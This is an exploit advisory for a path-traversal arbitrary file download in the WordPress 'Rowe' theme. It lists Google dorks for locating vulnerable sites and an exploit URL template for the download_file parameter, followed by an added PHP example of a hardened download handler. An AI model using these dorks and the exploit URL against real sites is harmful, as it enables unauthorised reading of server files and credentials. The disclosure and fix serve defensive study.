KingSkrupellos

WordPress 4.8.9 Rowe Themes Arbitrary File Download

Mar 18th, 2019
############################################################################################

# Exploit Title : WordPress 4.8.9 Rowe Themes Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepage : rowesa.co.za ~ knack.digital
knakdigital.com - wordpress.org
# Software Information Link : rowesa.co.za/#design-companies
# Software Affected Version : 4.8.9
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/rowe/''
intext:''Website designed by KNACK DIGITAL"
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019030141

############################################################################################

# Impact :
***********
* WordPress 4.8.9 Rowe Themes is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive information.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
* The software has a Relative Path Traversal vulnerability: it uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

Vulnerable File :
*****************
/download.php

Vulnerable Parameter :
********************
?download_file=

# Arbitrary File Download Exploit :
*******************************
/wp-content/themes/rowe/download/download.php?download_file=[FILENAME]
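
The CWE-23 weakness described above comes down to a missing canonicalise-then-contain check on the download_file parameter. The handler below is an added example of that check, not the theme's code and not part of the original advisory; the "files" directory, the extension allow-list and the function name resolve_download are assumptions.

```php
<?php
// Added example, not the theme's code: a download handler that cannot leave its base directory.
// Assumptions: files live in ./files beside this script; the extension list is illustrative.
declare(strict_types=1);

const ALLOWED_EXTENSIONS = ['pdf', 'jpg', 'png', 'zip'];

/** Map a user-supplied name to a regular file inside $baseDir, or null if it must be refused. */
function resolve_download(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    // Refuse empty names and NUL bytes before touching the filesystem.
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Canonicalise first: realpath() resolves "..", "." and symlinks, and fails for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check on the canonical path. The trailing separator stops
    // "/srv/files-private" from passing as a child of "/srv/files".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Allow-list by extension so source files such as *.php are never served.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true) ? $path : null;
}

// A repeated parameter (download_file[]=x) arrives as an array, so require a string.
$requested = $_GET['download_file'] ?? null;
$path = is_string($requested) ? resolve_download(__DIR__ . '/files', $requested) : null;

if ($path === null) {
    // One response for every refusal, so the handler does not reveal which paths exist.
    http_response_code(404);
    exit;
}

header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```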

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################